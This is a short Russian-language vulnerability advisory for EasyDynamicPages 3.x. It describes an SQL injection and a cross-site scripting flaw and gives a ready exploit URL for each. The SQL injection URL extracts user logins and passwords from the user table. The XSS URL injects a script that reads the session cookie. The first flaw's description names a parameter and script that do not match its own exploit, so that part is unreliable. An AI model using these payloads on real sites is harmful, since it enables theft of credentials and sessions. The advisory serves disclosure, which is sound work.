Программа: EasyDynamicPages 3.x
Уязвимость позволяет удаленному пользователю осуществить XSS нападение и
выполнить произвольные SQL команды в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "year" сценарием staticpages/easycalendar/index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://Example/dynamicpages/index.php?page=individual&table=
edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3, concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,
puPassword,0x3c656e64706173733e), 5,6/**/from/**/edp_puusers/*
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "year" сценарием staticpages/easycalendar/index.php. Атакующий может
выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.
Эксплоит:
http://Example/staticpages/easycalendar/index.php?PageSection=1 &month=4&year=<script>alert(document.cookie);</script>
